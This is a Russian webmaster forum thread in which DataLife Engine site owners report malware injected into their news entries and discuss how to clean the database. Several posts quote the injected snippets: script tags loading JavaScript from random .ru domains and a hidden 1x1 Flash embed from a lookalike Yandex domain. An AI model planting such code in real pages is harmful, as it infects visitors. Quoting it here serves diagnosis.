Вредоносный код или что?
Страницы: 1 2 3 След.
Вредоносный код или что?
Вообщем заметил, что в некоторых новостях, когда их редактируешь в краткой новости такой код:

<script async="async" type="text/javascript" src="jb2mihuez9025sm8vqgn.ru/356f30b135f0e9d716bec21a02cff1a1.js?in"></script> 

а в полной такой:

<script async="async" type="text/javascript" src="npbceyuwtc.ru/2885d2c5acd9c1537c855f52c47540f1.js?in"></script>

Версия движка 9.8 нулл

Кто-нибудь сталкивался с таким?
  я не админ и не программер а владелец, так что в кодах не шурупаю, но вот что случилось в течении последних трех недель с несколькими моими сайтами.
у меня вообще их много на разных хостингах но 2 сайта расположенные на одном хостинге:
pozitivportal.ru/index.php
kvazar.in.ua
вдруг неожиданно попали в черные списки яндекса с пометкой опасный сайт типа ворующий пароли и бла бла бла. ну и про то что в коде сайта обнаружен троян.
прикол в том что эти сайты созданы на разных движках их делали разные программеры и админят разные админы, они заходят с разных городов и понятно никак не могли занести одновременно туда что то вредоносное, да и за последнее время никаких изменений в коде не производилось.
я всех нахлобучил и они мучались рылись в кодах но так ничего и не обнаружили. и тут меня осенило что бок не в сайтах, а  в серваке)
я глянул в анализаторе соседей по серверу и наугад набил их адреса в яндексе и о чудо)) там было то же самое предупреждения.
все бы ничего но базы яндекса тянут себе браузеры и соцсети, и я оказался отрезан от всего рунэта который юзается яндексом меня все внесли в черные списки и забанили нафиг.
я нахлобучил админов сервака которые мне поначалу парили веселые басни типа попробуй закрыть форточку, выключить микроволновку, включить душ и прочитать заклинание и сайт заработает. я им накидал предьяв.
потом посидел покумекал что ж трапылось то.
оказалось следующее вот скрины, они были сделаны одновременно:
тут вирус есть
savepic.su/3165300.png
тут вируса нет))
savepic.su/3167348.png
я попросил админов сервера пока они там будут бороться с заражением всего сервера просто включить редирект с www на http. и чудо вдруг произошло- опера перестала ругаться. ну и я отправил запрос в яндекс на проверку ботами, он будет длиться несколько дней, но боты просто будут обходить зараженные места на серваке да и все. а потом админы сервака установили новое антивирусное обеспечение и ща обкатывают его. они уже нашли зараженные папки и архивы на куче сайтов и разослали их админам предупреждения, и так корпоративно все админы начали удалять зараженные папки с сервера, думаю за недельку дружненько гахнем трояна, а потом корпоративно начнем искать этого хакера, сайтов тысячи с разных стран. если запеленгуем- найдут в любой стране этого умника.
В панели Гугла и Яндекса написано, что вредоносный код на сайте не обнаружен
Цитата
Дмитрий пишет:
В панели Гугла и Яндекса написано, что вредоносный код на сайте не обнаружен
Скоро обнаружат, лучше уберите пока метку не поставили.
Открой свой магазин за 5 минут, их товары, их обслуживание, с тебя только клиенты >>> РЕГИСТРАЦИЯ <<<
Скрин выплат по запросу.
Рефералам помощь.
Цитата
Алексей SP пишет:
Цитата
Дмитрий пишет:
В панели Гугла и Яндекса написано, что вредоносный код на сайте не обнаружен
Скоро обнаружат, лучше уберите пока метку не поставили.
Уже гугл нашёл smile:( Вот только не понятно как эти коды попали в новость...
Цитата
Дмитрий пишет:
Вот только не понятно как эти коды попали в новость...
вы сами на свой вопрос ответили

Цитата
Дмитрий пишет:
Версия движка 9.8 нулл
Либо как вариант угнан доступ по фтп либо БД, так как в дле, тем более 9,8 запрещена вставка jsкодов непосредственно в новость. Значит код вставляли непосредственно в БД либо через фтп модифицировали файлы для снятия фильтрации кода в новости. Сейчас обнозначно менять все пароли, чистить БД, менять все файлы скрипта на чистые.
у меня такая же проблема, только стоит лицензия. ещё в Статических страницах подобные коды вшиты
тут скорее всего данные от бызы угнаны, нашел пару фалов в папке \engine\cache\system с содержанием текста из dbconfig.php
Изменено: Владимир - 8 Сентября 2013 13:44
Присоединяюсь к Вам, ребята...та же проблема. DLE 9.8, лицензия. Тоже в папке \engine\cache\system сторонние файлы, каких не должно там быть. Сейчас их удаляю, также удаляю скрипты из новостей...
хороший скрипт ( http://terobait48.ru/47-udalyaem-vredonosnyy-kod-skript-iz-dle-avtomaticheskoe-udalenie-freymov-iframe-iz-bazy-dannyh-dle.html )  быстро помог очисть бд новостей от всей этой грязи
Изменено: Владимир - 8 Сентября 2013 13:58
Цитата
Владимир пишет:
terobait48.ru/47-udalyaem-vredonosnyy-kod-skript-iz-dle-avtomaticheskoe-udalenie-freymov-iframe-iz-bazy-dannyh-dle.html]хороший скрипт быстро помог очисть бд новостей от всей этой грязи
Спасибо. Почистить обязательно нужно!Но вот вопрос: когда код появится опять? Конечно нужно и поменять все файлы скрипта на чистые, но хотелось бы знать откуда эта кака появилась... smile:confused:
на сайте сайте дле 10 августа появился Баг Фикс, я его только вчера поставил после того как всё это обнаружилось, может из-за него?
Цитата
Владимир пишет:
на сайте сайте дле 10 августа появился Баг Фикс, я его только вчера поставил после того как всё это обнаружилось, может из-за него?
Да, может быть...сам поздо увидил его
если почистили новости тем скриптом что я писал то ещё в PhpMyAdmin воспользуйтесь поиском по всем таблицам по слову async в пару таблицах тоже нашелся этот код, уже ручками его убирал
В общем все сделал, БД почистил от кода, гугл дал "зеленый"....а сегодня при редактировании в полной и краткой новости опять код, но уже такого вида:
Код
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="1" height="1"><param name="movie" value="webmasters-yandex.ru/flash.swf?1226517021"><param name="quality" value="high"/><param name="scale" value="exactfit"><param name="bgcolor" value="#FFFFFF"/><param name="AllowScriptAccess" value="always"/><embed src="webmasters-yandex.ru/flash.swf63404109" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="www.macromedia.com/go/getflashplayer"></embed></object>
 

где-то дырище, а где - непонятно...smile:confused:
Страницы: 1 2 3 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
13:53 AviTool - мощный инструмент для автоматизации работы с Avito 
17:01 Absence в Армении 
23:19 Ребята подскажите какими сервисами и прогами вы пользуетесь для SEO продвижения? 
19:30 Индексация страниц 
20:28 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 
14:50 Какую выбрать тему/нишу для сайта? 
18:32 Gambling Craft - гемблинг по белому 
04:06 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
15:37 Продам обменник криптовалюты, а также новый обменник под ключ с обучением. Скидки на скрипты обменника 
15:03 PonyBit.ru - обменный пункт PonyBit.ru (Понибит.ру) 
13:25 Sova.gg - надежный обменник криптовалюты. 
13:14 GoodsMoney.io 
20:37 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 
09:45 Резидентные Прокси Ротационные BACKCONNECT США Европа Микс 
10:59 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
20:17 Точные прогнозы на футбол 
12:23 150+ хакерских поисковых систем и инструментов 
08:38 Накрутка поисковых подсказок 
17:41 Стряхнуть обыденность - об Агасфере 
10:54 Добро пожаловать в цифровой мир... 
22:39 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор